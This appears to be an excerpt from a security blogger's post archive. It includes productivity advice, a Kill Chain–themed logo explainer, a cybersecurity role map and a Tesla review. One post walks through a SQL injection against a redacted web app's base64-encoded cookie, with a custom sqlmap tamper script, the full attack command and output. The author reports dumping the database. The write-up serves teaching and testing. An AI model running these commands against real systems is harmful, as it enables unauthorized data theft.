Let’s start with the “Two Minute Rule” ¹⁰, first introduced by David Allen in “Getting Things Done”. The rule simply states, “If you can complete a task in less than two minutes, you should just do it.” This is a core tenant of the Inbox Zero methodology. Look, no one loves procrastinating more than me, but by just doing it, you can clear things out of the inbox (reducing clutter) and start building productive momentum ¹² by completing the micro-tasks that these emails represent. ¹³
At the end of the day, an inbox is really just a list of things to do (e.g. read, delete, archive, etc…). A lot of peoples inboxes are PACKED, with 10’s, 100’s, even 1000’s+ of emails. This is naturally a bit overwhelming. Well David Allen is back with some really great advice on how to leverage a GTD philosophy to mentally tackle a large list of to-dos. He condenses the complexities of every day task prioritization into three separate dynamics - limitations, adaptability & life purpose.
E.J. Masicampo, a Psychology professor at Wake Forest University, has documented research examining the relationship between having too many “goals” activated within one’s environment and how that constrains mental faculties. In the context of email / lists in general, he essentially postulates that by having too many visible to-dos (or things on your list) at one time you compromise your mental effectiveness. He goes on to say that attention can be freed by satisfying “active goals”, such as through plan making or goal completion. One way in which to “make plans” in this context, and in the world of Inbox Zero, is to decompose a more complex task (originating in this case from an email) by creating a series of micro-tasks ¹³, thus devising a plan to complete the overall task.
The “Zeigarnik Effect” states that “people tend to remember unfinished or incomplete tasks better than completed tasks”. This model suggests a key to overcoming procrastination is to simply, just get started. So by leveraging something like the Two Minute Rule ¹⁰, we can psychologically build productive momentum. Further, the Zeigarnik Effect suggests that mental health improvements can be achieved by A. NOT having incomplete items languishing in your to-do list and relatedly, B. the sense of accomplishment you get by completing tasks. ¹³
In fact, it’s well understood that when we humans check things off, our brains release dopamine that in turn makes us feel, amazing. That satisfaction and sense of accomplishment can have a snowball effect, motivating us to continue completing even more tasks. By leveraging this simple psychology, we can overcome procrastination by starting small and working our way towards larger and larger tasks. Where a task may be too large and intimidating to begin, consider breaking it into smaller, more atomic micro-tasks, each of which is more easily individually digestable.
A word of warning!: While leveraging to-do lists and GTD ¹¹ methodologies has a lot of practical utility, be weary of over-generating to-dos in the name of micro-task-completing ¹³. This is the way towards developing an OCD complex.

Outro

At the end of the day, how and what you do with your email is somewhat personal and what’s “best” for one person will not necessarily be the same for someone else. If you are drowning in email or like the idea of Inbox Zero, consider this slightly tweaked approach!

References

The Shellsharks Logo Chronicles

Mon, 25 Jul 2022 07:00:00 -0400

This piece details the craziness that is the Shellsharks logo.

Ok, so I realize it’s less of a logo and more of a complicated graphic I use as the “splash screen” of sorts for the site. I understand that logos, generally speaking, are far simpler and this is anything but. In any case… let’s get into it!

Inner Space

I like to think of the logo in terms of two distinct regions, the “Inner Space” which houses the 7 individual smaller circular symbols and the “Outer Space” which is essentially the large red ring with the 3 sharks, QR code and ring of binary characters.

The Cyber Kill Chain

The primary inspiration for the symbology in the Inner Space is Lockheed Martin’s Cyber Kill Chain. Though I know this model has been somewhat deprecated in favor of newer frameworks such as MITRE ATT&CK, I still think the Kill Chain has valuable (albeit more simplistic) applicability. Also, capturing ATT&CK in a graphic similar to the existing one would be even more insanely complex!

Shellsharks Logo Symbology

Let’s walkthrough the sequence of 7 symbols and how they visually represent each phase of the Kill Chain. (Note: You may need to zoom in on the individual icons as we go).

Reconnaissance

Starting on the left, we see a variety of satellites, satellite dishes and cameras all pointing towards the center circle. This represents reconnaissance performed against the target which is, again represented by the center icon. Note how the reconnaissance logo is the first one the sharks on the left are swimming to, which is meant to signify that it is the first step for the attacker (i.e. the sharks).

Weaponization

The second circle represents weaponization. As such, I've put a lot of weapon-related icons (e.g. swords, arrows) and military-invoking visuals into the icon.

Delivery

Here we can see a rocket launch, simply depicting payload delivery.

Exploitation

There is quite a bit of symbology going on in this icon. We have the exploit "chain" (meant to look like 1's and 0's) going around the outside portion of the circle. There is a computer with a kraken on it (meant to just be menacing). We are running our exploit (on a Unix-based machine presumably) via ./exploit. Finally, we have a soup of 1's and 0's interspersed and spilling out of the logo into the following phase.

Installation

Here we see the stream of 1's and 0's from our exploitation phase being piped into the victim computer. The computer has a downward arrow to very plainly represent installation of malicious code.

Command & Control (C2)

This icon depicts a terminal interacting with a seemingly remote installation (i.e. one on a distant planet). This particular icon I've always really loved as it reminds me of the Endor shield generator dish from Return of the Jedi.

Actions on Objectives

Finally, we have the "Actions on Objectives" icon. Here we see a road to a building that's meant to be "Capitol-esque" with fireworks and the letters "DC01" above it. The idea here is that the objective was to capture the DC (i.e. Domain Controller). Basic, I know right?

Outer Space

Now we blast into Outer Space (the area of the logo which contains the sharks, QR code and enciphered binary ring)…

Sharks

Threat actors, hackers, red teamers, etc…

QR

Scan it (or click) and find out! Probably not malware…

Cipher Challenge

The binary stream encircling the logo is in fact ciphertext. Older variants of the logo contained clues for decryption. The current logo doesn’t really. I should probably add some clues back… To get ya started, I have provided the ciphertext below. Good luck!

01010111 00110110 01000101 01101111
01010101 01101001 01110111 01001110
01100111 01001110 00110111 01000001
01001001 01010000 01010100 01111010
01000100 01011010 01100001 01101100
01110110 01110111 00111101 00111101

History

Behold! The evolution of the logo… I don’t think either of the first two were ever actually on the public site though.

Cybercomplexity

Tue, 21 Jun 2022 10:50:00 -0400

Cybersecurity is a great field, but it’s becoming increasingly complex and the intellectual barrier-to-entry is rapidly growing. Though the terms shown below span multiple sub-disciplines within infosec, it is not uncommon for senior or even mid-level security engineers to be expected to have a relatively decent understanding of a large swath of the concepts depicted below. If nothing else, this cloud (i.e. cybersoup) should serve as a reminder that it is infeasible to truly be a master in everything cybersecurity.

I really started thinking about how much there is to know in this field and it really is mind-boggling…

Cyber Glossaries

10-Step Getting-Into-Infosec Playbook

Wed, 29 Dec 2021 01:00:01 -0500

SANS SEC450 Review

Tue, 28 Sep 2021 00:00:01 -0400

Cybersecurity Role Map

Mon, 16 Aug 2021 10:50:00 -0400

The mind-map below is my attempt at inventorying and classifying the plethora of roles that exist within the field of cybersecurity. Beyond this map, I’ve provided some additional context, gotcha’s and other notes related to the map itself.

Notes on the Map

Alright, so you’ve seen the map and I expect many will have questions or things about it they wish to challenge. Let me try to address some areas of improvement and provide additional context around my thinking…

It’s very possible something on the map is not where it should be, could be reclassified or something is missing. If you think so, I’d love to hear about it so I can make edits to the map!
Though these roles can exist independently, many of us in the industry know that you are likely to “wear many hats”, especially if you work for smaller organizations. As such, many people who see this map may identify as two or even more things here that may even exist in multiple different categories.
I like to consider “Vulnerability Management” both an offensive security role as well as a blue- ish security operations role. Maybe I’m biased having gotten my start in VM, but I think most in the field of offensive security would at least agree that identifying vulnerabilities (recon / enumeration) is a big part of the offensive methodology. Thus, I consider VM the starting point for offensive ops. I also definitely consider it in many ways an “operations” role.
There are a bunch of things (on the right-side of the map) that I had trouble classifying into their own group. Maybe there is a good category to shove them in but for now they float.
By “Cybersecurity Training”, I merely mean the act of teaching other security professionals infosec topics. Compared to “User Awareness Training” which is about teaching non-security personnel how to maintain security awareness.
“Security Engineering” is a role that could easily be applied to just about anything. For the purpose of this map, I’m considering “engineering” to be related to the build, integration and deployment of security tooling - with an emphasis on build. Again, it’s easy to apply the “engineering” title to other disciplines but I think this is a decent way of viewing things.
“Product Security” (or Product / Platform security) is where I’ve decided to lump in individual, specialized security disciplines (e.g. things like - Windows, Linux, ICS, Juniper, etc…) - Essentially, those who are specialized in securing specific products or platforms. I’ve left it as orange to designate it too as an “engineering” discipline.

Outro

Alright, I hope this helps give you a better idea of the different roles within infosec! In addition to this, I recommend you check out Daniel Miessler’s piece on “Rainbow Teams” or even look at how ISC2 defines the various security domains. I also think this Career Pathway Roadmap from NICCS is a great way to visualize your path into any of the various roles described in this post.

Finally, for any suggestions, corrections, comments or anything else, I always appreciate feedback!

SANS SEC460 & GIAC GEVA Review

Wed, 11 Aug 2021 00:00:01 -0400

Sqlmagic, the Tamper Spell

Tue, 27 Jul 2021 10:50:00 -0400

Since (at least) 2010, SQL Injection (and other types of Injection) has been number one (A1) on OWASP’s famed OWASP Top Ten list. The OWASP Top 10 (for those who aren’t familiar) represents the top 10 “most critical security risks to web applications” and is developed (by OWASP) using a broad consensus from within the (global) appsec community. “Risk” in this case, is measured not only on severity and impact but also on the relative frequency of the vulnerability class. In other words, SQLi is consistently ranked at the top, year after year, not only because it represents significant risk to any given application (and potentially its underlying infrastructure) but also because it is very frequently found.

There are many variants of SQLi, yet finding and subsequently exploiting this flaw is not always trivial. However, application security professionals have a magic weapon that does exactly this - SQLMAP! (Find it here or in a Kali image near you!)

        ___
       __H__
 ___ ___[(]_____ ___ ___
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|

Before reading any further, know that this is not a guide to using sqlmap. For that, I recommend you check out the Github project for sqlmap and read through it’s usage documentation.

Tamper Scripts

Let’s discuss the awesomeness that is sqlmap Tamper scripts (invoked using sqlmap via the command-line parameter “--tamper=TAMPER”). To explain Tamper scripts, I’ll start with sqlmap’s own documentation…

sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation.

This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism usually is a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF). All buzzwords to define the same concept, implemented in a different way and costing lots of money, usually.

To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts and this will process the payload and return it transformed. You can define your own tamper scripts, use sqlmap ones from the tamper/ folder or edit them as long as you concatenate them comma-separated as value of the option –tamper (e.g. –tamper=”between,randomcase”).

Cool right?! Who doesn’t want to bypass WAFs? In addition to fuzzing / otherwise-testing poor input validation methods, Tamper scripts are also helpful when targeting particularly challenging injection vectors, an example of which I will describe in detail below…

A Difficult Injection Vector

I recently encountered an interesting SQLi vulnerability that was somewhat difficult to inject into, specifically with sqlmap, which is my go-to SQLi exploitation (and often discovery) utility. To set the scene, the web app in question had a simple GET parameter “id=1”. Naturally I first tried to inject directly into the GET parameter but came up empty both with manual exploitation as well as using sqlmap…

[WARNING] GET parameter ‘id’ does not seem to be injectable

Bummer… Taking a closer look at the application logic, I noticed a cookie was being set as a result of submitting the GET request. The cookie was set as shown below…

Set-Cookie: userchl2_info=%7B%22last_book%22%3A%22MQ%3D%3D%22%2C%22userchl2%22%3A%22%22%7D

Subsequent requests anywhere within that same subdomain/path would include that cookie value. When (URL-)decoding the cookie value (%7B%22last_book%22%3A%22MQ%3D%3D%22%2C%22userchl2%22%3A%22%22%7D), I get the unencoded value, {“last_book”:”MQ==”,”userchl2”:”“}. I can see that the value for the dictionary pair with key “last_book” appears to be base64 encoded (the equal signs “=”, which serve as base64 padding give this away). Further (base64)-decoding that value I see that MQ== is equal to the value “1”, which is of course the original GET parameter value of id which was also 1!

OK, so now that I know how the GET parameter is stored within the cookie, I then inject a properly encoded (remember we must base64 encode the last_book value as well as URL encode the entire cookie value) apostrophe (‘) into that JSON key/value pair to see if I can’t trigger a SQL error (in typical SQLi testing fashion). After base64 encoding the apostrophe, the result is “Jw==”. After URL encoding the entire payload cookie value I have %7B%22last_book%22%3A%22Jw%3D%3D%22%2C%22userchl2%22%3A%22%22%7D.

Submitting this new payload, I find the following SQL error in the response.

mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in [redacted].php

Eureka! This error demonstrates that I may indeed have a SQLi flaw. To continue to exploit this manually given the multiple encoding steps as well as the need to inject it into a particular location of the cookie value would be exhausting. Why not instead have sqlmap do the heavy lifting? By default, sqlmap does not handle the transforms and pinpoint accuracy required to pull this off. However, with the added functionality of Tamper scripting, we can extend sqlmap’s capabilities and do exactly that.

Becoming a Tampermage

Sqlmap has a variety of out-of-the-box Tamper scripts, all of which can be found in /share/sqlmap/tamper/. The one’s that come standard as well as any additional home-brewed scripts will all have the general format shown below…

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

Using a (single) Tamper script is easy, you can even chain multiple Tamper scripts together! Example usage is show below…

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

Of course, there was no exact out-of-the-box script that would do everything I needed in this particular use-case, so I needed to develop my own from scratch or at least modify an existing script. To get me started, I used the base64encode.py Tamper script as a launch point as I knew I needed to do some base64 encoding. This script in it’s (original) entirety is displayed below…

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Base64-encodes all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    return encodeBase64(payload, binary=False) if payload else payload

Alright, so this is a good start. Let’s recap what I need out of my final Tamper script in order to inject the properly encoded payload in the exact right location…

I need to inject into the userchl2_info cookie value.
The payloads generated by sqlmap must be wrapped in the JSON dict {“last_book”:”[PAYLOAD]”,”userchl2”:”“} (which is the properly formatted value for the injectable cookie).
sqlmap payloads must be base64-encoded.
The entire cookie value must be URL-encoded.

OK… so to do this, I changed the final return statement in the original base64encode.py Tamper script to the return statement shown below…

return urllib.parse.quote_plus('{"last_book":"' + encodeBase64("9999" + payload[1:],binary=False) + '","userchl2":""}')

Quickly decomposing this one-liner as it relates to my previously stated requirements…

I can inject my (tamper-transformed) payloads into the cookie as part of a sqlmap command by setting the --cookie parameter to ‘--cookie=”userchl2_info=”‘.
In the new return statement, I have {“last_book”:”’ + [PAYLOAD STUFF] + ‘”,”userchl2”:”“} which satisfies the JSON wrap.
Using encodeBase64(“9999” + payload[1:],binary=False), I am able to encode the inner-payload as base64.
Finally I use urllib.parse.quote_plus(…) to URL-encode the cookie value in it’s totality.

Putting this all-together in my sqlmap command…

sqlmap -u "[redacted].php?id=1" --cookie="userchl2_info=" -p "userchl2_info" --tamper="/usr/share/sqlmap/tamper/base64encode2.py" --dbms=MySQL --not-string="expects parameter 1 to be resource" --level=3

* Remember I discovered the DB was MySQL earlier when I first triggered the SQL error.
* I also discovered the “--not-string” when I first triggered the original SQL error.
* I’m not sure why (some more digging is needed), but for this to work, sqlmap must be run with Level 3, --level=3.

Running this command I get a lot of output - most importantly I see…

[INFO] heuristic (basic) test shows that Cookie parameter ‘userchl2_info’ might be injectable (possible DBMS: ‘MySQL’)
Cookie parameter ‘userchl2_info’ is ‘Generic UNION query (NULL) - 1 to 20 columns’ injectable
Cookie parameter ‘userchl2_info’ is vulnerable.

In other words, this injection vector was successful and I was indeed able to dump the database. The big takeaway here is that Tamper scripts are awesome and you can easily create your own which can precisely target and ruthlessly fuzz potential injection vectors.

I now graduate as a sql(map) Tamper-wiz!

Shock & Awe, a Tesla Revue

Thu, 15 Jul 2021 10:50:00 -0400

With thunderous prose,
I conduct this review.
I'm amped to share,
and transform your view.

The joule of my garage,
it never stays static.
Caught lightning in a bottle,
did Elon so emphatic.

In a flash you will see,
what I bring to light.
My current thoughts of Tesla,
so don't storm off, take flight.

My poetic energy fades,
we must bolt to it.
So watt are we waiting for,
We've come full circuit.

Update as of January 30, 2025: Given the current state of things with Tesla, and more specifically, with its owner, I felt compelled to add a quick note here. I still love EVs, and I think... despite everything, that Teslas are \*still\* great cars. BUT! I wouldn't recommend you buy one, not anymore. I also want to emphatically state that what Elon has chosen to stand for, is anti- everything I stand for.

Yes, that is a poem about a review about Tesla. No, I’m not ashamed of this. As you may be able to tell, I’m a big fan of Tesla! I’ve been a Tesla EVangelist for years and have answered many a question during that time. And though there are far more EV’s (especially Teslas) on the road now than there were 3 years ago when I took delivery of my Model 3, I still see a lot of the same questions, FUD and unquenched curiosity. This piece is designed to address these areas.

More specifically though, this is a review of my (2018) Model 3, which I've newly renamed "Thundermage" in honor of this review.

Common Questions & Misconceptions
Positives
Negatives
Other, Neutral Stuff

Common Questions & Misconceptions

In this first section, I will answer the most common questions I am asked about Tesla and EV’s in general. I’ll also address some common misconceptions. For other information, check out Tesla’s new owner FAQ!

How do I charge it?
How fast does it charge?
How much does it cost to charge?
What kind of range does it have?
How do I get into or out of the car?
Will I get stuck?
EVs aren’t any more green than gas cars

How do I charge it?

Tesla provides a relatively comprehensive guide to charging on their site. In that guide, they discuss home charging, destination charging and supercharging. The bottom line is, you have a lot of options when it comes to charging. I’ll dive into these options below.

120v outlet : Yep! You can charge on a standard wall outlet, and many people go this route for their primary, every-day charging solution! Charge times are a little slower but it can get the job done, especially if you have all night to juice up. This is great when you think about it because outlets such as these are pretty ubiquitous. Anywhere where you can charge your phone, you can charge your car! At your grandma’s house? Plug it in! At an Airbnb? Plug it in! You can charge this thing anywhere.
In fact, all Teslas come with the Mobile Connector Bundle which includes the 120v outlet adapter.
Tesla Wall Connector : For home charging, Tesla’s (and my) recommended method is the Tesla Wall Connector. At $500 it’s a little pricey, but if you’ve purchased a $50,000 car that relies on being charged, I think the investment is worth it. I also recommend getting the longer cable (18’) as it gives you a little additional versatility. For help installing the unit (and I strongly recommend getting professional help), Tesla has provided a resource to find licensed electricians that can take on the project.
240v outlet : If you want a little faster charging but don’t want to fully commit to Tesla’s Wall Connector, the 240v outlet is likely the way to go. Typically seen in garages for use with a refrigerator or laundry machine, this is a good EV-agnostic way to get faster charging speeds. In other words, the 240v outlet is a good option if you don’t want to spend the extra $$ on the Wall Connector or if you plan on having a non-Tesla EV.
Destination Charger : So you won’t always be able to charge at home, so what are your options when out on the road? Well it turns out, there are a TON - and not just bumming small amounts of charge off of random 120v outlets either. Enter Destination Charging - from hotels to restaurants to resorts, destination charging is available at over 4500 sites (and counting). Destination charging is typically on par-with or close-to what you get out of a Tesla Wall Connector or standard 240 outlet. I’ve even found plenty of destination charging that is offered completely for free. What’s better than free fuel!?
For other destination charging, Tesla themselves recommend Plughsare.com
DC Fast Charger : Though I haven’t used one of these myself (thanks to Tesla’s Supercharger network being so robust), Teslas are also capable of utilizing third-party DC fast charging networks such as Electrify America and EVgo. All you’ll need is the $400 CHAdeMO Adapter - ouch!
Tesla Supercharger : Saving the best for last, there is Tesla’s incredible Supercharger network. This network represents the largest collection of fast-chargers in the world and they are designed and made available exclusively to Teslas (for now). This is the primary means for charging while on road trips. It’s fast, convenient and with 25000+ stalls world-wide, available pretty much no matter where you are. Superchargers are typically located in parking lots within shopping areas so you can grab food, use the restroom or stay somewhat entertained while you charge up.

How fast does it charge?

Charging speeds are typically separated into three categories, L1-L3. These categories are described below.

L1 : This typically means the standard 120v outlets. You can expect anywhere from 3-5 miles/hour on average. For a car that needs 300 miles range, this means a charge time of 60-100 hours to charge from zero to full. A little slow but will work in many situations where you only need to get 50 miles or so with an overnight charge.
L2 : Level 2 charging includes 240v outlets, Wall Connectors and Destination Charging. L2 will typically net you around 25-45 miles/hour. A zero-to-full charge session would thus take you anywhere from 7-12 hours. Perfect for overnight charging. I should mention though that the top-end of L2 charging (approx. 44 miles/hour) is obtained by using the Tesla Wall Connector with 48 amp output.
L3 : Finally, we have the top end charging, Level 3. For Teslas, this typically means Superchargers, but would also include DC Fast Chargers. To answer, “how fast does a Supercharger charge” though is a little trickier to answer. Current-gen, “V3” Superchargers can charge at speeds of up to 1000 miles/hour. Wow! But those speeds are only obtained at certain Superchargers and when the vehicle’s state-of-charge (SoC) is low. When actively charging, as the battery is closer to max capacity, charging speeds dip. Rather than give you numbers here, I can say that anecdotally, while on my road trips, I stop every 2 hours or so to stretch my legs or use the restroom and in that time I plug the car in. After 10-15 minutes, I return to the car with more than enough juice to get to the next stop. This is the recommended approach for road-tripping in a Tesla. Note: Having never used a “DC Fast Charger”, I really can’t speak to it’s charging speeds. Sorry!

How much does it cost to charge?

This depends where you charge, and the price of electricity during the time/region you are charging. But to give you an example, I pulled some numbers from my own home charging. Based on my last electric bill, I am on-average billed $.13/kWh. The Tesla Model 3’s battery pack is a 75 kWh pack (newer packs have more kWh). This means it costs $9.75, or about $10, to charge the pack from zero to full. On that 75 kWh, my car gets about 300 miles. So let’s say 10$ will get you 300 miles range.

Now let’s take a traditional ICE car, like a Toyota Corolla. With a 13.2 gallon tank and gas prices hovering around $3/gallon, it costs about $40 for a full tank. With approximately 400 miles range, we can take 75% of both the range and that cost and come up with a value of $30 to go an equivalent 300 miles in the Corolla.

What we end up with is a difference in price for home-charging the Tesla at 1/3 the price of gas as compared with the Corolla for the same amount of miles.

Now many also ask about the price of Supercharging. The cost of Supercharging is about 2x the cost of home charging, typically around $.26-$.28/kWh (compared to the $.13/kWH I was getting at home). Doubling the cost of electricity still leaves you with a final cost of 2/3 the amount of gas.

I will add that the numbers I used for home charging were based on average cost of electricity during a one month span. It is important to note that charging your car in off-peak hours will result in cheaper costs per kWh. So if you are home-charging in the dead of night, it will actually be even cheaper than calculated to juice up the car.

What kind of range does it have?

When I first took delivery of my car, it was rated at 310 miles of range.

With that said, three years into ownership and after a full charge, my car normally reports that I have about 290 miles range. This may be due in part to battery degradation, but I know from speaking with Tesla engineers that it is more likely due (in large part) to the way Tesla calculates range. Essentially, the car will determine range based off my normal efficiency, i.e. the way I typically drive. In other words, since I tend to drive somewhat, spirited, the car adjusts my range calculation to take into account the lower efficiency. Neat!

How do I get into or out of the car?

This isn’t a question I get, but it always seems to be a challenge for people when first learning how to get in and out of a Model 3.

Will I get stuck?

Range anxiety and uncertainty around how and where to charge is by far the biggest fear amongst prospective EV purchasers. And though Teslas and similar EVs have really good range (250+ miles), driving long distances is, in reality, not as simple as just getting in your car and going. There is some level of planning that should go into your drive. In a Tesla, this can be calculated for you by the onboard computer. It will plan your route and give you all the places you should stop to charge. It bases this on a number of factors including distance, elevation gain, temperature and more. What’s important to take away is that you really need to plan your route and understand where you would like to stop. When driving along major throughways, you can generally count on there being charging every 50 miles or so though. In this case, less planning may be required.

EVs aren’t any more green than gas cars.

A common argument amongst EV-haters is that EVs are no more eco-friendly than gas cars because the way the electricity that is used to charge the car is sourced is not-in-fact “green”. This is not accurate.

A Quick Study: Using the EPA’s Power Profiler I can get an idea of my carbon emissions based on the number of kWh I consume in a year in my region (SRVC). Estimating 15000 miles of driving distance with my car that has about 300 miles range, that comes to about 50 complete zero-to-full fill-ups. With a 75 kWh battery pack, this means a total of 3750 kWh of electricity used for charging in a year or 312.50 kWh/month.

At the bottom of the Power Profiler there is an Emissions Estimate function which can take a monthly kWh value and calculate an annual emissions rate based on your particular eGRID subregion (mine is SRVC - SERC Virginia/Carolina). With a usage of approx. 313 kWh/month, my annual estimated emissions is 2,928 pounds CO2.

OK, so now let’s use the carbonfootprint.com calculator to determine the annual CO2 emissions for the Toyota Corolla. Using the calculator, I plug in 15k miles, the 2020 Toyota Corolla CVT 2WD (which according to this calculator has an efficiency score of 165.363) and I end up with an annual emissions value of 3.99 metric tons or about 8,000 pounds CO2.

So the Corolla produces about 2.66x more carbon emissions than the Tesla. Not good!

Positives

As I’ve said, I love my Tesla, and there are so many reasons why. I’ve tried to compile these reasons here.

Charging at home : Never having to go to a gas station is really one of my favorite perks of the car. You get to laugh smugly as you drive past the sad folk putting stinky dinosaur juice into their cars. Plus, you’ll always have a “full tank”, or as much juice as you need (as long as you remember to plug it in) thanks to the ability to charge at home.
Electricity is cheaper than gas : Mile for mile, electricity is on average much cheaper than gas. Oh, and there are many places where you can charge completely for free - try getting free gas anywhere! Features like scheduled departure and scheduled charging can help get the most cost-efficient home charging as well.
It’s fast : My car (Model 3 Dual Motor) goes 0-60 in about 4 seconds. Even after three years, I still find that punch to be pretty exhilarating. That speed isn’t just for fun though, being able to quickly position yourself is a highly practical feature, especially when merging on highways.
Very bright headlights : I don’t like driving at night. The headlights on my car makes it a lot more bearable.
The glass roof is cool : The glass roof not only looks great but gives the inside of the car a very open feeling. I also love to watch planes as they fly overhead or look at the towering trees/buildings when I am in a wooded or city area. (All of course while I’m not driving).
Frunk space : Where a gas car normally has an engine, a Tesla has a storage area known as the “Frunk”! Who wouldn’t appreciate having a little additional storage space?
Handles wind well : What I mean here is that even in heavy cross-winds, this car feels incredibly stable. The weight of the car, low center of gravity and the (short) height of the car are primary contributors.
The display : The 15” screen is not only hyper-versatile, it also looks really really cool. Navigation is huge, gaming and other entertainment looks great, it’s just a really nice experience. The screen takes the place of the traditional instrument cluster. What this means is that your speed gauge is on the screen which is to the right of you rather than directly behind the wheel. Some people fear that this will inhibit them from being able to see their speed as easily. I find that it is just as easy if not easier to see it in large print on the huge screen.
Purchase experience : No contest here. Buying a car with a few clicks online is infinitely better than going into a dealership. You can even use Apple Pay!
Eco-friendly : As discussed in the section above, this car will produce less carbon emissions than a traditional ICE car. What’s not to like about that? Especially considering the insane heat wave the US has been experiencing.
Range is superb : At 300+ miles, my car has more than enough range for any trip I have thrown at it. Sure, it’s not as much raw range as some equivalent gas cars, but I never drive 300+ miles in one sitting, so getting to stop and charge up is always a nice respite from sitting in the car.
The Supercharger network is great : Superchargers are everywhere! They are typically found in shopping centers so you have access to food and more while charging. Supercharging is cheaper than gas and in my experience (driving on the East Coast), I have never had to wait for a spot.
Low maintenance : Tesla’s guidance on maintenance is very simple. From this guide, there really isn’t that much that goes into taking care of the car! In the three years I’ve owned the car, I’ve only taken it into the dealership once (a few days after taking delivery to fix a few small aesthetic things). What’s even better is that when you do have an issue with the car, it’s highly likely that Tesla will be able to send a Mobile Service vehicle to you which can resolve your maintenance issue without you ever having to leave your house. Awesome!
Regenerative braking : Arguably the biggest difference in driving an EV versus driving a traditional ICE car is the regenerative braking. Once you’re used to it though, I think it offers a superior and far less exhausting driving experience. Essentially, regen-braking allows you to never really have to take your foot completely off the accelerator and put it on your brake. Over the course of a long drive, your feet and legs are less tired without the constant moving and placing.
Very safe & secure vehicle : All Teslas are extremely safe cars. NHTSA consistently scores Teslas at 5-stars across the board in their crash-safety tests. Tesla scores so well for a few reasons. First, Teslas are very hard to roll - their low center-of-gravity thanks to the very heavy battery pack in the floor of the car helps contribute to this. Second, with no gas motor, there is less risk of fire/explosion in the event of a crash, plus, the lack of the motor in the front allows the front to be a crumple zone. Finally, Teslas come with a lot of cool, advanced security features standard. Things like the Dashcam, cabin camera, security alarm, pin to drive, sentry mode, intrusion sensors, auto lane adjust, obstacle aware braking, etc…
Onboard Dashcam : Though i’ve just mentioned the Dashcam, it’s worth mentioning again. Having a built in Dashcam which captures not only the view out of the front of the car but also the sides is really cool and very useful in the event of an accident. What’s better, you can view Dashcam footage right inside the car on the huge screen. Amazing!
Control with your phone : Being able to control the car with my phone is great. I hate carrying keys and now I don’t have to! I can control climate, charging, trunk/frunk, windows, and even request service all from my Tesla app.
Make’s fart noises : There’s a built-in whoopie cushion. Hilarious.
Gaming : Tesla Arcade includes a number of games including Polytopia, Cat Quest, Fallout Shelter, Stardew Valley, CupHead, BeachBuggy Racing 2, backgammon, solitaire, chess and a bunch of Atari-classics including 2048, Asteroids, Centipede, Super Breakout, Lunar Lander, Missile Command, Millipede, Tempest and Gravitar. Phew! These games are playable via the touch screen, the steering wheel and even via a classic game controller such as an Xbox or Playstation controller. So fun!
Entertainment : As long as you have Premium Connectivity, you can enjoy a number of other entertainment options in the car. Netflix, Twitch, Hulu and Youtube are some of the available options at this time. This isn’t a feature I use much, but when I do need it, it makes sitting in the car really great.
OTA updates : A lot of the software-enabled features I have mentioned in this section are things that the car did not originally ship with. Rather, they are features that have been added to the car, all for free. This includes everything from Dashcam to Sentry Mode to Tesla Arcade to the entertainment features. My car has even had improved acceleration pushed to it via software based optimizations. Truly incredible.

Negatives

Though I love my car, it isn’t perfect. There are a number of things I wish we’re different or that are just bad. I’ve listed these below.

AC unit is a little weak : I find that the onboard Tesla AC unit is a bit weak. It doesn’t ever seem to get as cold or as hot as I’d like it to and it doesn’t seem to cool or heat very quickly. Compared to my old Toyota Corolla, it definitely falls short. You don’t really want to lose to a Toyota Corolla.
Not a hatchback : My biggest gripe with this car after 3 years is the trunk. It’s actually quite roomy but really, I wish it was a hatchback. The Model Y has this feature and it’s much better.
EV tax credit has expired : The $7500 federal tax credit for EVs has run out for Tesla. At the time I bought my car, I actually got the full amount. But for those looking to purchase a Tesla these days, you won’t get any help from the federal government. With that said, there are other state/local incentives to consider.
Charging on 120v is slow : Though charging on 120v is really cool and a very useful feature, it doesn’t change the fact that it is very slow. If you only have an over-night to charge or need to charge up quickly, you’re going to be disappointed relying on 120v.
Self-park does not come standard : The self-parking feature is bundled with the exorbitantly expensive FSD package. I think this is ridiculous. Self-parking has been a feature of far less advanced cars for a long time. I really wish this came standard or was bundled with some other sort of much cheaper premium upgrade.
Horn is difficult to trigger : Maybe i’m just too gentle with my car, but I always find when I try to honk I’m either not pressing the right spot, or I am not smashing the wheel hard enough. I wish there was just a button.
Engaging windshield wipers is not ideal : A couple issues with the windshield wipers. First, the rain-sensing auto-wipers do not work very well. I find that they either don’t wipe fast enough, fail to wipe at all or wipe when it’s not really needed. Tesla is apparently attacking this problem with… a neural net solution? Second, engaging the wipers is a little clunky and non-ideal. You can click the button at the tip of the left wheel stalk to invoke a single wipe, at which point the modal for the wiper speed is brought up on-screen. From there, you must look down and press the speed you’d like the wipers to be at. This isn’t great since typically when you are needing the wipers, especially at a higher speed, it is raining and not the best time to take your eyes of the road.
Turning radius isn’t great : Compared to my old Toyota Corolla, I find that the Model 3 has a really bad turning radius.
Tires wear quickly : You’ll find that spirited driving is a common occurrence with a Tesla. This tends to wear the tires down quicker. This means more $$ for new tires.
People will try to race you : It could be that I’m just hyper-sensitive to people accelerating off the line, but I always get the sense that people want to race me. The good news is, I always win =).
Premium connectivity costs extra : If you want live traffic, video/music streaming or internet browsing capability, you’ll need to subscribe to Tesla’s Premium Connectivity at $9.99/month. This isn’t ideal, but i rarely use any of those features outside of live traffic.

Other, Neutral Stuff

